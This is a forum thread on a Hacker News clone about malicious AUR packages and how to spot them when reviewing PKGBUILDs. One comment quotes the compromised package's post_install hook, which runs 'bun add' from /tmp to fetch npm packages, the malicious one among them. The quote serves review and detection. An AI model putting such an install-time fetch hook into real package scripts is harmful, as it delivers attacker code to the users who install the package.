Remix.run Logo
Remix clone Hacker News
new | show | ask | jobsGithub
codemac 2 hours ago

> isn’t that also the case for every browser extension, VSCode extension, nuget package, Cargo crate, python package, npm package

Yes, and all of those have supply chain hacks in them, and have happened within the last year? In this specific case, it's a malicious npm package being installed with official npm tooling in the PKGBUILD.

The advantage to the AUR is just that you can reasonably review every PKGBUILD for what you're installing, they are very simple bash scripts. It'd be great if more people would donate resources to help verify and validate AUR scripts, but the AUR specifically exists for packages that the trusted users and devs of arch don't have time to personally maintain.

DavideNL an hour ago | parent [-]

Curious, in this specific case: if people DID review the PKGBUILD, what exactly would they recognize to spot these packages were compromised ?

Tharre 43 minutes ago | parent | next [-]

From the concrete example someone posted below, you'd see that a post-install hook exists, literally this line:

> install=toggldesktop-bin-deps.install

And the toggldesktop-bin-deps.install contains this:

> post_install() {{

> cd /tmp

> bun add axios uuid ora js-digest

> }}

Seeing any install hook download anything from the web should immediately raise alarms when reviewing, even before you checkout what packages it actually installs.

Matl an hour ago | parent | prev | next [-]

Some things I try to check for

- sources array has sources that don't correlate to the package name/purpose or are from strange places, like github repos that don't seem relevant etc.

- extensive post install scripts suggesting it's doing a lot more than is normal

But those are very crude, I wonder if an AUR helper could optionally consult a local LLM to review a PKGBUILD before installing these days...

weaksauce 44 minutes ago | parent | prev [-]

typically attacks happen when the URL for the source code or binary gets changed significantly... or like in this attack someone adds something to the post_install section which does something like add an npm install command. a lot of updates for binaries are just version bumps and SHA hashes changing which are easy to vet if you trust the source to not be compromised.